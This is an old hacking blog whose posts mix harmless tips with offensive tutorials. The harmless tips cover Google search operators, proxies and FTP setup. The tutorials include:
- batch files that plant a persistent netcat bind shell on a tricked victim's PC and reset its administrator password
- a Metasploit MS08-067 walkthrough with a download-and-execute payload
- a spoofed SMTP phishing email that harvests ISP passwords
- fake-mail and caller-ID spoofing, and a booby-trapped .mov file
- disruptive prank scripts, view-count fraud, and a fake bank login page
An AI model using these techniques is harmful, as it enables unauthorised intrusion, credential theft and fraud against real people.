Friday, December 31, 2010

How to use google fully

Google has become THE icon of the internet. This search engine has so thoroughly transformed navigation of the internet that its name has become a verb. Yet most people do not know how to use this tool to its fullest extent. This TUTORIAL focuses on the advanced commands available on Google. For readability's sake I put search terms inside of <> aside from having it in BOLD Text. So entering 7900gt voltmod into the search field in google will appear in this FAQ as <7900gt voltmod>.

Quotes - The simplest advanced command is the quotation. Google's engine typically ignores word order. Searching for will return about the same results as . The results will be slightly different because of how google searches its servers, but it will still look for sites containing these elements regardless of order. Entering <"X Y Z A B C"> will search only for sites containing the string X Y Z A B C, with all elements included, in that order, one after the other.

site - Sometimes you will want to search a site that does not have a search function. Don't worry - google will come to the rescue. In order to search for the string overclock on symbianize.com, simply enter
<"overclock" site:symbianize.com>. No http:// or anything like that is required, just <{search terms} site:{URL}>. Don't forget the ":" between "site" and the url

filetype - Just as you can use google to search on a particlular site, you can use google to search for a specific filetype. To search for PDF files on Intel products search for . The format for this search is <{search terms} filetype:{extention}>. Extentions do not require "." before them. To search for, say, a daa file - search <{st} filetype:daa>.
*NOTE - Google does not go all-out to index every file type. Searches for anything other than .pdf, .ps, .doc, .xls, .ppt, or .rtf (thos listed in advanced search under filetype) will not return vary many results.

inurl - Searches the URL of a site rather than its contents. To search for sites with overclocking related url's - enter . This can be used in conjuction with other searches. For example, will search for sites with url's containing overclock for text containing intel.
Similar to this is the allinurl command. This will allow the user to search for more than one word in a url. The search will behave like the search above, and will search for both intel and overclock in a site's url.

intext - the intext command searches the actual text of a website rather than its tags. It can get annoying when you search for a word/phrase - find a promising website - then find out that what you searched for is not actually on the site. The intext command solves this. The related allintext works in the same way as allinurl.

.. - the ".." command searches for ranges. Searching for any GPU in GeForce's 8 series can be challanging, so you can input to get results of any Geforce from the 8500 to the 8850.
*NOTE - This search will also search for 8501, 8502... It does not (to my knowledge) allow for incrementing.

- - the "-" or minus command excludes terms from a search. Let's say that you want to search for a game called "World War II" but you want the game and not the War. Many sites about the War will have the word Nazi in them. So search for <"World War II" -Nazi> to search for sites including "World War II" that do not contain the word Nazi.

~ - Including a tilde in front of a word searches for that word and its synonyms. A search for <~angry> will search for angry, mad, furious, etc.

OTHER GOOGLE TRICKS

Google cache - When the googlebot visits a web page, it takes a picture of it and stores it on its server. If you have the url of a site that has been taken down, google the url. If you are lucky, google has a cached image that you can view. This is also useful for looking for sites that have been changed recently.


In the right hands Google can be one of the internet's most powerful tools. Knowing exactly what google can do will make finding exactly what you want much easier.

Monday, December 6, 2010

Prank virus Codes

Batch programming viruse
NO.1
 It opens up a command prompt, and pretends like there's a virus on ur computer. 
Codes:
cls
@echo off
title VIRUS
color 06
echo YOU HAVE A VIRUS ON YOUR COMPUTER
pause
echo CONTACTING ANTI-VIRUS....
pause
echo DO YOU WANT TO DELETE VIRUS?
pause
echo ACCESS DENIED
echo ACCESS DENIED
echo ACCESS DENIED
pause
echo ACTIVATING VIRUS.....
echo VIRUS ACTIVATED!!!!
pause
:1
dir/s
goto 1


     NO.2
    Codes:
    cls
    :A
    color 0a
    cls
    @echo off
    echo Wscript.Sleep
    echo Wscript.Sleep 5000>C:sleep5000.vbs
    echo Wscript.Sleep 3000>C:sleep3000.vbs
    echo Wscript.Sleep 4000>C:sleep4000.vbs
    echo Wscript.Sleep 2000>C:sleep2000.vbs
    cd %systemroot%System32
    dir
    cls
    start /w wscript.exe C:sleep3000.vbs
    echo Deleting Critical System Files…
    echo del *.*
    start /w wscript.exe C:sleep3000.vbs
    echo Deletion Successful!
    start /w wscript.exe C:sleep2000.vbs
    echo:
    echo:
    echo:
    echo Deleting Root Partition…
    start /w wscript.exe C:sleep2000.vbs
    echo del %SYSTEMROOT%
    start /w wscript.exe C:sleep4000.vbs
    echo Deletion Successful!
    start /w wscript.exe C:sleep2000.vbs
    echo:
    echo:
    echo:
    echo Creating Directory h4x…
    cd C:Documents and SettingsAll UsersStart MenuPrograms
    mkdir h4x
    start /w wscript.exe C:sleep3000.vbs
    echo Directory Creation Successful!
    echo:
    echo:
    echo:
    echo Execution Attempt 1…
    start /w wscript.exe C:sleep3000.vbs
    echo cd C:Documents and SettingsAll UsersStart MenuProgramsStartuph4x
    echo start hax.exe
    start /w wscript.exe C:sleep3000.vbs
    echo Virus Executed!
    echo:
    echo:
    echo:
    start /w wscript.exe C:sleep2000.vbs
    echo Disabling Windows Firewall…
    start /w wscript.exe C:sleep2000.vbs
    echo Killing all processes…
    start /w wscript.exe C:sleep2000.vbs
    echo Allowing virus to boot from startup…
    start /w wscript.exe C:sleep2000.vbs
    echo:
    echo:
    echo Virus has been executed successfully!
    start /w wscript.exe C:sleep2000.vbs
    echo:
    echo Have fun!
    start /w wscript.exe C:sleep2000.vbs
    pause
    shutdown -s -t 10 -c “Your computer has committed suicide. Have a nice day.”





     NO.3
    what it does is, it replicates the BSOD (Blue Screen Of Death) windows error. It pretends like there's a problem in your boot sector. It

    keeps opening up new command prompts that say "ERROR" and Its really simple to understand too. So basically, its n00b friendly!


    Code:
    cls
    @echo off
    cd /
    cls
    color 1
    echo A problem has been detected and Windows has been shut down to prevent damage
    echo to your computer.
    echo.
    echo The problem seems to be caused by the following file: SPCMDCON.SYS
    echo.
    echo PAGE_FAULT_IN_NONPAGED_AREA
    echo.
    echo If this is the first time you've seen this stop error screen,
    echo restart your computer. If this screen appears again, follow
    echo these steps:
    echo.
    echo Check to make sure any new hardware or software is properly installed.
    echo If this is a new installation, ask your hardware or software manufacturer
    echo for any Windows updates you might need.
    echo.
    echo If problems continue, disable or remove any newly installed hardware
    echo or software. Disable BIOS memory options such as caching or shadowing.
    echo If you need to use Safe Mode to remove or disable components, restart
    echo your computer, press F8 to select Advanced Startup Options, and then
    echo select Safe Mode.
    echo.
    echo Technical information:
    echo.
    echo *** STOP: 0x00000050 (0xFD3094C2,0x00000001,0xFBFE7617,0x0000 0000)
    echo.
    echo.
    echo *** SPCMDCON.SYS - Address FBFE7617 base at FBFE5000, DateStamp 3d6dd67c
    pause :nul
    cls
    echo Downloading viruses . . .
    ping localhost -n 5 :nul
    shutdown -s -t 30 -c "Deadly BlackBat Virus Found, Boot Sector Deleted"
    start echo "ERROR 0022x3343328834"
    ping localhost -n 5
    start echo "ERROR 0022x3343328834"
    ping localhost -n 5
    start echo "ERROR 0022x3343328834"
    ping localhost -n 5
    start echo "ERROR 0022x3343328834"
    ping localhost -n 5
    start echo "ERROR 0022x3343328834"
    ping localhost -n 5
    start echo "ERROR 0022x3343328834"
    ping localhost -n 5
    start echo "ERROR 0022x3343328834"
    ping localhost -n 5
    start echo "ERROR 0022x3343328834"
    ping localhost -n 5
    start echo "ERROR 0022x3343328834"
    ping localhost -n 5
    dir /s
    pause :nul

    NOTE: Use at your own risk 

    Sunday, November 21, 2010

    HIde IP (PROXY,VPN's)

    1. Open your browser (ex. Mozilla Firefox).
    2. Redirect to this site (http://www.samair.ru/proxy/fresh-proxy-list.htm).
    3. Choose your category (ex. Socks).
    4. Now find the IP of your choice and the port (keep it for later use).
    5. If on FireFox -> Tools -> Settings -> Advanced -> Connection -> Settings -> Now tick 'Manual Proxy Configuration' -> Put your IP and port in empty field and check the box under the field.
    6. You're done! Enjoy your 100% anonymous browsing.

    Useful Links:

    Proxies - http://www.samair.ru
    Fresh Proxy List - http://www.samair.ru/proxy/fresh-proxy-list.htm
    Proxy List Sorted By Time - http://www.samair.ru/proxy/time-01.htm
    Socks - http://www.samair.ru/proxy/socks.htm
    Check if you're anonymous - http://checker.samair.ru/

    Useful VPN softwares  (IP hiders)

    Cyberghost VPN  software  Download


    JAP   software        Download


    FreeProxy software    Download


    AnalogX Proxy software   Download


    HOTSPOT Shield  software    Download


    Saturday, November 13, 2010

    Hacking a network PC

    Requirments: Netcat 

    As we all know, a Trojan is very likely to be picked up by AV, what you need is Netcat, netcat opens a port on a computer for access (If used correctly by a batch file you open a port on a target computer). You will need to write a batch file. The batch file to copy netcat on the remote computer will have to be run from the target computer (The person on the target will have to execute the batch file in some way). Open Notepad and type this in:



    @echo off

    cd\
    xcopy \\yourIP\shared folder\netcat.exe
    copy \\yourIP\shared folder\netcat.exe (just to be sure)
    cd "Documents and Settings"
    cd "All Users"
    cd "Start Menu"
    cd Programs
    cd Startup
    xcopy \\yourIP\shared folder\Startup.bat (This is another batch file you will write)
    cd\
    netcat.exe -L -p 9999 -d -e cmd.exe
    Save the file as a batch file using Notepad.

    The next batch file will be used to make sure the port you specified opens up every time windows starts up, you can specify any port you wish. Open Notepad and type:


    @echo off

    cd\
    netcat.exe -L -p 9999 -d -e cmd.exe

    Save the file as a batch file using Notepad, this will be the file that is copied into the startup folder in the previous batch file we wrote. You can bind the batch file to another file and share that file, let the target execute that file so that he can copy netcat and the other batch file onto his/hers computer thus opening port 9999, after port 9999 has been opened you can then use telnet and telnet to that port on the target computer to have full access without ever needing any passwords of any sort.
    After you are in change the Administrator password for if something happens to your files, the command is this:

    net user Administrator newpassword

    Now from here you can do what you want, e.g try shutting down the target computer by browsing to his system32 folder and then type in:

    shutdown -r -t 10 -c "Hello"

    the computer will then restart in 10 seconds time. You can even play around more by Installing Cain & Abel on your computer and then installing Abel remotely on his computer (Since you know the Administrator password) Once you have Abel on the target you can start and stop services and do more! 

    MOre command can be executed .... 

    Wednesday, November 3, 2010

    How To Setup Your Own Anonymous Email Service

    So now we need a host that supports PHP and SendMail !
    Here is one that works perfect , and without ads !
    x10hosting.com
    Create an account there !

    Now open notepad and paste this PHP code  Download from here


     Save it everywhere u want as mail.php
    Then upload it in your host you created (x10hosting) via FTP !

    Now we finished , only go at

    yourname.x10hosting.com/mail.php

    And start sending your fake emails ! :)

    Monday, November 1, 2010

    Poart forwarding

    • A Static IP-Address (Unless you wanna Port-Forward every single day).
    • Read, understand and then follow this guide.
    • Time and patience.

    The start

    First of all, I want you to write down some stuff.
    Go to Start>Run>CMD (On vista, type CMD in the search field).
    Now type, Ipconfig /all.
    Now locate your information, and you will write down the following.
    Your IP-address and your default gateway.


    Getting closer

    Now type your default gateway into your address-bar to enter your Routers configuration site.
    Now, if this is your first time, use the following login-information
    (This is different from ISP to ISP, this is the usual ones)
    U = Username. P = Password.

    U = admin P = Blank
    U = admin P = admin
    U = Blank P = admin.

    If neither are working, contact your ISP for more information.

    Now, this is very different from router to router, we will have to find the page for us to Forward these darn ports!

    Look around, trying to find it, here are some hints.

    Applications & Gaming / LAN servers / Firewall / Ports / Port-Forwading.


    Almost done!

    Name/Application/What ever : Type in the name of the Application, which ports you are forwarding. E.G Steam, Warcracft, BitTorrent.

    Start & End : Type in the port you are forwarding.

    Protocol : Pick Both (UDP & TCP)

    IP-address : Type in your IP-Address.

    Example:
    Code:
    Warcraft
    6112 - 6112
    Both
    192.168.1.5


    Hopefully this will help you lost people out there!

    Sincerely, iGirls.


    Useful links, Thanks to Rob and Montana"

    http://www.portforward.com/english/route...rindex.htm
    http://www.routerpasswords.com/

    Saturday, October 30, 2010

    How To Call Your Friends From THeir Own Cell Number

    How To Call Your Friends From THeir Own Cell Number".


    1. Go to http://www.mobivox.com and register there for free account.

    2. During registration, remember to insert Victim mobile number in "Phone number" field as shown below.

    3. Complete registration and confirm your email id and then login to your account. Click on "Direct WebCall".


    4. You will arrive at page shown below. In "Enter a number" box, select your country and also any mobile number(you can enter yours). Now, simply hit on "Call Now" button to call your friend with his own number.


    5. That's it. Your friend will be shocked to see his own number calling him. I have spent last two days simply playing this cool mobile hack prank.

    Tuesday, October 26, 2010

    5 in 1 Hacking Ebooks Collection and Video Training

    5 in 1 Hacking Ebooks Collection and Video Training | 792 MB
    1. Best Ever Hacking Video Collection AIO
    2. Certied Ethical Hacking and Countermeasure course V 6.12 AIO
    3. Best Hacking Books AIO 2009
    4. Ankit Fadia Hacking Collection AIO | Fresh links

     

    Sunday, October 24, 2010

    How to make (.mov) virus

    Tools Needed
    NotePad++
    And My .Mov File
    WinRar

    Download Links
    http://adf.ly/9gGn (notepad++)
    http://adf.ly/9gHh (basefile 4mb + Quicktime .ico) <--- MUST HAVE

    How To Make It Open Your Link

    Step 1.

    Download The BaseFile And Notepad++ if Dont Have And Extract

    Step 2.

    Right Click "BaseFile 4mb.mov" And Click "Edit With Notepad++"

    Step 3.

    When In Notepad++ Hit CTRL+F A Menu Should Pop Up Looking Like This


    In Find Search Google Then Replace With Your Direct Download Link

    Step 4.

    To Shrink Link And Put In The (.mov) File

    Wednesday, October 20, 2010

    Learn few linux command

    Accessing_Linux_Partition_Using_Rescue_Disk.rar
    Accessing_Windows_Partiton_In_Rhel_4.rar
    Acl__Access_Control_List_.rar
    Assigning_Ip_Address_To_The_Host.rar
    Auto_Mounter.rar
    Changing_Default_Run_Level.rar
    Changing_Host_Name.rar
    Changing_Run_Level_At_Startup.rar
    Changing_Run_Level_Using_Init_And_Telinit.rar
    Creating_And_Mounting_Iso_File_System.rar
    Creating_Swap_Partition_And_Swap_File.rar
    Dhcp_Configuration.rar
    Displaying_Message_On_Login.rar
    Dns_Configuration.rar
    Ftp_Server_Configuration.rar
    Installing_Google_Earth.rar
    Installing_Kernel.rar
    Installing_Nero_Linux.rar
    Installing_Tar_Ball_-_Mp3_Blaster.rar
    Job_Scheduling_Using_At_Command.rar
    Locking_And_Unlocking_Terminals.rar
    Lvm__Logical_Volume_Manager_.rar
    Nfs_Server_Configuration.rar
    Recovering_Root_Password.rar
    Remote_Login_Using_Ssh.rar
    Rpm_Installation.rar
    Rpm_Installation_And_Downloading_File_From_Ftp_Server
    Samba_Server_Configuration.rar
    Secure_Copy_From_Remote_Server.rar
    Service_Commands_And_Files.rar
    Sytem_Information_Gathering_Commands.rar
    Techsmith_Screen_Capure_Codec.rar
    Troubleshooting_Fstab.rar
    Troubleshooting_Mouse.rar
    Troubleshooting_X-Windows.rar
    Using_Cat_Command_To_Create_Append_Dsiplay_File.rar
    Using_Chkconfig.rar
    Using_Fdisk_And_E2label_Command.rar
    Using_Tar.rar
    Using_Vi_Editor.rar
    Visudo.rar


    VIdeo files no audio


    Monday, October 18, 2010

    How to set up proxy server

    What we need

    * Web Host

    In theory, any webhost will do, if they comply with the other requirements; an old computer in your basement, or even a free online webhost.

    * PHP5 or greater and cURL

    Look for this on the website of your webhost. If it’s paid hosting, you can almost count on it. Especially cURL is a feature that’ll be disabled on most free webservers.

    * Permission

    That’s right. Some webhosts will explicitly forbid you to create a proxy server (or a chat room, for that matter) in their terms of content. And you can expect them to find out.
    1. Download and Install GlypeProxy

    GlypeProxy is a free, standalone PHP script. That means it’s lightweight and incredibly easy to configure. You can download it from their website.

    Next, upload the files to a sub directory on your webserver. If you see a folder called ‘www’, or called after your domain name (e.g. domain.com) create the sub folder in there. You need to avoid using the word ‘proxy’, because some companies pick up on it. Instead, use ‘web’ or ’surf’.

    There are a few different ways to upload your files. If you already know this, skip to the next paragraph. Here they are arranged from the least to the most effort.

    * Upload and unpack ZIP

    Look in the filemanager for an ‘unpack’ or ‘extract’ option. You can then upload it in one take. This is not always supported.

    * FTP access

    Use an FTP application to access your webhost, and let it transfer the files while you fetch some more coffee. Most often supported.

    * Manual upload

    You really don’t want to do this – are you sure the previous two alternatives are blanked out? Your last resolve will be to manually upload all the files and folder structures. Or start looking for a different host – it might not be such a bad idea.
    2. Ready For Use

    There’s no real set-up needed. Just point your browser to the directory where you put all those files (ex. domain.com/surf) and GlypeProxy will pop up. If you don’t like the logo, you’ll have to replace it manually. But if you want a proxy server for personal use, some little branding won’t matter.

    Users can enter any URL and, after expanding the options, choose to encode the URL, the page, allow cookies, scripts and objects. Encoding the page can help you access some sites that are still being picked up and intercepted, but might give you a corrupt webpage at times.
    3. Admin Preferences

    Although Glype is a powerful proxy script, the admin tools are obviously the backing power. You might not know this, but a lot of online proxy tools are powered by Glype, just like the one you just set up. The admin preferences leave room not only for customization, but for improvement. You can assign site-specific code for trouble-giving websites, and change user-agent and proxy lists.

    Most useful to novice users will be the caching tools (pictured above), logs, and blacklists. The caching tools can help you improve the browsing speed by storing some files from all, or some of the already visited websites. Logs are off by default, but might have legal importance in the future, depending on who uses your proxy server. Always explicitly mention you’re keeping these logs. Finally, the blacklists will allow you to block (all but) a few sites, or users.

    To access your admin panel, point your browser to admin.php on your webserver (e.g. domain.com/surf/admin.php).

    Are you setting up your own personal proxy server? Do you have any other tips or experiences on the issue? Let us know in the comments below!

    Saturday, October 16, 2010

    HOw to bypass 60 sec on deposite file

    To bypass the 60 second time limit:
    1. Go to the link of the file you want to download. You can use any link for testing.

    2. Click free downloading

    3. as soon as the countdown starts right click anywhere and click view page source

    4. Press CTRL + F and search for download_url

    5. After the first match look a little below that and you'll see the direct link to the file hosted on their site.

    6. Copy and paste that link into your browser

    7. Begin downloading Superman

    How to download multiple files at once:
    1. Open all the files you want in seperate tabs

    2. Click free downloading on all of them one by one. It won't detect you're doing it to more than one file yet because you didn't start downloading anything.

    3. Repeat steps 3-7 on all of them

    Well that's it, use this while it lasts because chances are they'll patch it pretty soon. Have fun

    Friday, October 15, 2010

    How to boost your views on website or any thing

    Step 1: Paste the following code into notepad:

    http://uploading.com/files/d5e5eb97/tag.txt/

    Step 2::When you insert your link, make sure you take out the brackets, now click on the file you just saved as a (.html) or (.htm) and when all the boxes load up, make sure you just refresh, now for every line of the < iframe src... > you get one view



    Step 3:Now save it in notepad as an .html document. The name doesn't matter, make sure you save it as all formats, and the filename ends in (.html.)



    NOw put this frames in wherever you want and you get maximum hit on your pay per link or youtube videos ....

    Friday, October 8, 2010

    HOw to create a FTP server on your pc

    Requirements:
    Serv-U
    No-IP.com Website

    Quote:
    Step 1. Getting a static IP address.
    Get a static address for your FTP server. You will want to do this as opposed to using your IP address for several reasons. First, it̢۪s easier keeping up-to-date. Imagine having to change all of your setting every time your IP changed. With No-IP, the No-IP service runs in background on your computer and updates your current IP address with your FTP server̢۪s URL (for example, you get ftp://rkchoolie.serveftp.com). Second reason, you don̢۪t want your IP address posted out there for everyone to see.

    1. Go to http://www.No-IP.com to create a new user account.
    2. Fill in the information that is required and the click Register button.
    3. Your account has now been created and your account password has been emailed to you.
    4. Check your email mailbox and wait for the mail that contains your password
    5. Go back to http://www.No-IP.com and type your email address and password to login to your account.
    6. Once in your account, click on Add a host in the left menu
    7. Type in the Hostname you want (example: rkchoolie) and pick a Domain from the list (example: ftpserve.com)
    8. Check Allow Wildcards and click the Submit button
    9. You now have your static address (example: rkchoolie.serveftp.com)
    10. Click on your OS link in the Dyn-Update Client in the bottom right menu and follow links to download the client
    11. Once downloaded, install the software and type in your email address and password when asked.
    12. Finally tick the checkbox near your static address.

    You now have a static web address .


    Quote:
    Step 2. Installing and setting the FTP server
    1. Install Serv-U 4.0.
    2. Start Serv-U and use the wizard to setup your ftp.
    3. Click next until you're asked for an IP address, leave it blank and then click next.
    4. Type the domain name you've just registered above (example: preacher.serveftp.com) in the domain name field and then click Next.
    5. You are asked if you want to allow anonymous access, select No and then click next.
    6. You are then asked to create a named account, check yes and then click next.
    7. Type in the user name you wish for this account (example: Harrie) and click next.
    8. Type a password for this account (example: $p3c1aL). For security reasons, try to create a password with some letters, numbers and special characters. Then click next.
    9. You will then be asked for the Home directory of the account you just created. Select the directory and then click next.
    10. Select yes to lock this account to the Home directory. You want to do this so that the user can not go any further up that his home directory. Click next.
    11. The account is now set so click finish.

    Quote:
    Step 3. Configuring user accounts
    1. In the left tree-menu, select the account you've just created and then click on the General tab.
    2. Check Hide ‘Hidden’ Files.
    3. Check Allow only and enter the number one in the box.
    4. Set the Max. download speed to what ever you want. If this is an account that many will be using, set it low to save on your bandwidth. I usually have mine set between 10 – 20. If you leave it blank, users will be able to download from you at full bandwidth.
    5. Set the Max no. of users to how many you want to be able to log on at one time. This depends on your connection speed but try these (56 - 1, ISDN - 3, ADSL or cable - 5-6 users.)
    6. Now, click on the Dir Access tab.
    7. You should see the home folder in there. Highlight it and make your permissions.
    8. If you only want users to be able to download check only Read, List, & Inherit.
    9. If you want users to be able to upload, but to only one particular folder but not download, click the add button and then select that folder. Now highlight the folder and set these permissions on that folder. Check Write, Append, List, Create, & Inherit. Once you have made the permissions click on the up arrow that is located at the bottom right-hand corner. You want this special upload folder to be list first, before the home folder.
    10. If there is a folder that you don̢۪t want anyone to have access to, but it is inside the home folder, then click the add button and then select that folder. Now highlight the folder and make sure that all checkboxes are left. Once you have made the permissions click on the up arrow that is located at the bottom right-hand corner. You want this no access folder to be listed at the very top.
    11. There are many other different sets of permissions you can play with. I just covered your basics.
    12. Your server is now set!
    13. Try logging on with the username and password and see if it works.

    Hacking through IP address

    Requirements:

    Nmap
    Metasploit

    First of all you need target ip of your victim.

    Then open Metasploit Console & type db_create.
    [Use: This’ll create or connect you to database.]

    Once you do that type Nmap.
    [Use: This’ll load Nmap in Metasploit Console]

    Next you need to type db_nmap -sT -sV
    [This’ll scan OS, Ports, and Services running on victim’s computer.]
    Wait for 5 min’s to complete its scan.
    Once done, Note down the OS, Ports, and Services running on victim’s computer.

    Now it’s time to exploit victim’s machine.
    Exploit depends on the OS, Ports, and Services running on victim’s computer.
    So, you’re lucky if you get OS WIN XP or 2000 because it’s easy to exploit them.
    No matter weather they’re protected by any firewall or not.

    Now I’ll tell you exploiting:-

    Windows 2000 (all versions SP1, SP2, SP3, SP4)
    Windows XP (all versions SP1, SP2, SP3)

    Type show exploits
    [Use: This’ll show all the exploits in its database.]

    Next you need to type use windows/smb/ms08_067_netapi
    [Use: This’ll select the exploit windows/smb/ms08_067_netapi]

    Now Type show targets
    [Use: This’ll show all targets by exploit]

    Now Type set target 0
    [Use: This’ll set target to 0 specified]
    Then type show payloads
    [Use: This’ll bring up all the payloads]
    Next type set payload windows/download_exec
    [Use: This’ll set payload as windows/download_exec]

    Then Type show options
    [Use: This’ll show all options in the exploit & payload]
    In window you’ll see many options, in which you need to
    Fill only two options RHOST & URL.

    Type set RHOST
    [Use: This’ll set RHOST (victim’s ip) to xxx.xxx.xxx.xxx]

    Next Type set URL http://www.xxxx.com/xxx.exe
    [Use: This’ll set URL to your direct server link.]

    At last you need to type exploit
    [Use: This will launch your exploit & your victim will be infected.]

    You can now control you're victim with RAT.
    So, any versions of Win 2000-XP can be exploited easily.
    In case if you didn’t get this two OS’, immediately after Nmap scan
    You can use the command db_autopwn –p –t –e.
    In most cases you get a shell.

    Monday, October 4, 2010

    How to Get someones ISP password.(free internet)

    How to Get someones ISP password.


    1.) run your telnet program:
    on windows , go to START -> RUN -> "TELNET".
    on linux , you should open a shell , and write telnet.
    2.) then connect (on windows "connect" , on linux "open") some anonymous server , if don't have any then search for one , if you are too lame then email me now! i'll give you in the minute! note: you should connect the server mail program (port "25")!
    3.) now , write the following :

    mail from:[**YOUR FRIEND'S ISP WEBMASTER**]
    rcpt to:[**YOUR FRIEND'S EMAIL ADRESS**]
    data
    Hi there [YOUR FRIEND'S NAME] , this is [NAME OF YOUR FRIEND'S ISP] support team , lately , our server had some problems with the connection and the user-password files were destroyed , a backup was then released , and it was ok.
    but yesterday we found out that it is not an updated version of the file , so , it will start charging you for a larger amount of money for each our you use!
    - - - - - - - - - - - - - -
    To correct the problem , we have made a speical program to correct the error , all YOU have to do is email :
    "[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" and in the SUBJECT write your "user name" and "password".

    note: No moeny will be returned if you don't follow our instructions!

    thank you,
    the support team!

    4.) press enter twice and then write "."(without the "") and press ENTER!

    --
    now , the places you saw ** say that maybe you didn't understood it all , so i'll give you a simple example .

    [**YOUR FRIEND'S ISP WEBMASTER**] - example , if your friend is connected througe AOL , then type "webmaster@aol.com" , get it?

    [**YOUR FRIEND'S EMAIL ADRESS**] - example , if your friend's email is john@aol.com, then type "john@aol.com".

    [YOUR FRIEND'S NAME] - if your friend is called "John" then type "John".

    [NAME OF YOUR FRIEND'S ISP] - if your friend is connected through AOL(American Online) , then type "American - Online"

    "[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" - this is the hard-part , but if you are reading this , then don't worry , you're one step from the end! ..

    * launch your WWW browser(MICROSOFT INTERNET EXPLORER\NETSCAPE) , and type "HTTP://www.galaxycorp.com".

    * Sign there for an account , now , when they ask you what username you want, then try the closest thing to your ISP name(ex - if your friend is connected thourgh American Online[AOL] then try "aol" or "a_o_l" or "american_online" !)

    * and when they ask for your email , type your Real one!!!
    now continue in your normal life , and remember to read your email!
    if you suddenly get a message from your friend's email adress , and the subject is "john j4o87HnzG" then , guess what , you just saved 10$ a month!
    _______________

    Thursday, September 30, 2010

    How to hack with a ip address

    So say somehow somewhere we ended up choosing a target to start wreaking havoc upon. All we need is an IP Address. Theres plenty of papers out there that go into how to obtain an IP Address from the preferred mark of your choice. So I'm not going to go into that subject. Alright so say we got the targets IP Address finally. What do we do with this IP Address. Well first ping the IP Address to make sure that its alive. In otherwords online. Now at the bottom of this document ill include some links where you can obtain some key tools that may help on your journey through the electronic jungle. So we need to find places to get inside of the computer so we can start trying to find a way to "hack" the box. Port Scanners are used to identify the open ports on a machine thats running on a network, whether its a router, or a desktop computer, they will all have ports. Protocols use these ports to communicate with other services and resources on the network.

    1) Blues Port Scanner - This program will scan the IP address that you chose and identify open ports that are on the target box.

    Example 1:
    Idlescan using Zombie (192.150.13.111:80); Class: Incremental
    Interesting ports on 208.225.90.120:
    (The 65522 ports scanned but not shown below are in state: closed)
    Port State Service
    21/tcp open ftp
    25/tcp open smtp
    80/tcp open http
    111/tcp open sunrpc
    135/tcp open loc-srv
    443/tcp open https 1027/tcp open IIS
    1030/tcp open iad1
    2306/tcp open unknown
    5631/tcp open pcanywheredata
    7937/tcp open unknown
    7938/tcp open unknown
    36890/tcp open unknown


    In example 1 now we see that there are a variety of ports open on this box. Take note of all the ports that you see listed before you. Most of them will be paired up with the type of protocol that uses that port (IE. 80-HTTP 25-SMTP Etc Etc...) Simply take all that information and paste it into notepad or the editor of your choice. This is the beginning of your targets record. So now we know what ports are open. These are all theoretical points of entry where we could wiggle into the computer system. But we all know its not that easy. Alright so we dont even know what type of software or what operating system that this system is running.

    2) NMAP - Port Scanner - Has unique OS fingerprinting methods so when the program sees a certain series of ports open it uses its best judgement to guess what operating system its running. Generally correct with my experiences.

    So we have to figure out what type of software this box is running if we are gonna start hacking the thing right? Many of you have used TELNET for your MUDS and MOOS and weird multiplayer text dungeons and many of you havent even heard of it before period. TELNET is used to open a remote connection to an IP Address through a Port. So what that means is we are accessing their computer from across the internet, all we need is their IP Address and a port number. With that record you are starting to compile, open a TELNET connection to the IP Address and enter one of the OPEN ports that you found on the target.
    So say we typed 'TELNET -o xxx.xxx.xxx.xxx 25' This command will open up a connection through port 25 to the IP xxx.xxx.xxx.xxx. Now you may see some text at the very top of the screen. You may think, well what the hell, how is that little string of text going to help me. Well get that list you are starting to write, and copy the banners into your compilation of the information youve gathered on your target. Banners/Headers are what you get when you TELNET to the open ports. Heres an example of a banner from port 25.


    220 jesus.gha.chartermi.net ESMTP Sendmail 8.12.8/8.12.8; Fri, 7 Oct 2005 01:22:29 -0400


    Now this is a very important part in the enumeration process. You notice it says 'Sendmail 8.12.8/8.12.8' Well what do ya know, we now have discovered a version number. This is where we can start identifying the programs running on the machine. There are some instances in which companies will try and falsify their headers/banners so hackers are unable to find out what programs are truly installed. Now just copy all the banners from all the open ports *Some Ports May Have No Bannners* and organize them in the little record we have of the target. Now we have all the open ports, and a list of the programs running and their version numbers. This is some of the most sensitive information you can come across in the networking world. Other points of interest may be the DNS server, that contains lots of information and if you are able to manipulate it than you can pretend to hotmail, and steal a bunch of peoples email. Well now back to the task at handu. Apart from actual company secrets and secret configurations of the network hardware, you got some good juicy info. http://www.securityfocus.com is a very good resource for looking up software vulnerabilities. If you cant find any vulnerabilities there, search on google. There are many, many, many other sites that post vulnerabilities that their groups find and their affiliates.

    At SecurityFocus you can search through vendor and whatnot to try and find your peice of software, or you can use the search box. When i searched SecurityFocus i found a paper on how Sendmail 8.12.8 had a buffer overflow. There was proof of concept code where they wrote the shellcode and everything, so if you ran the code with the right syntax, a command prompt would just spawn. You should notice a (#) on the line where your code is being typed. That pound symbol means that the command prompt window thats currently open was opened as root. The highest privilage on a UNIX/Linux Box. You have just successfully hacked a box. Now that you have a command shell in front of you, you can start doing whatever you want, delete everything if you want to be a fucking jerk, however I dont recommend that. Maybe leave a text file saying how you did it and that they should patch their system.....whoever they are. And many times the best thing you can do is just lay in the shadows, dont let anyone know what you did. More often than not this is the path you are going to want to take to avoid unwanted visits by the authorities.

    There are many types of exploits out there, some are Denial of Service exploits, where you shut down a box, or render an application/process unusable. Called denial of service simply because you are denying a service on someones box to everyone trying to access it. Buffer Overflow exploits are involved when a variable inside some code doesnt have any input validation. Each letter you enter in for the string variable will be 1 byte long. Now where the variables are located at when they are in use by a program is called the buffer. Now what do you think overflowing the buffer means. We overflow the buffer so we can get to a totally different memory address. Then people write whats called shellcode in hex. This shellcode is what returns that command prompt when you run the exploit. That wasnt the best description of a buffer overflow, however all you need to remember is that garbage data fills up the data registers so then the buffer overflows and allows for remote execution of almost every command available. There are many, many other types of attacks that cannot all be described here, like man-in-the-middle attacks where you spoof who you are. Performed correctly, the slave will enter http://www.bank.com and his connection will be redirected to your site where you can make a username and password box, make the site look legit. And your poor mark will enter their credentials into your site, when they think its really http://www.bank.com. You need to have a small script set up so it will automatiically display like an error or something once they try and log in with their credentials. This makes it seem like the site is down and the slave doenst give it a second thought and will simply try again later.
    __________________________________________________ _______o_________

    So as a summary of how to 0Wn a box when you only have an IP Address
    Method Works On BOTH *Nix and Windoze

    ****You can do the same with domain names (IE google.com) than what you can with IP Addresses. Run a WHOIS Lookup or something along those lines. Or check up on InterNIC you should be able to resolve the domain name to an IP address.****

    - Port Scan The Address And Record Open Ports
    - Telnet To Open Ports To Identify Software Running On Ports

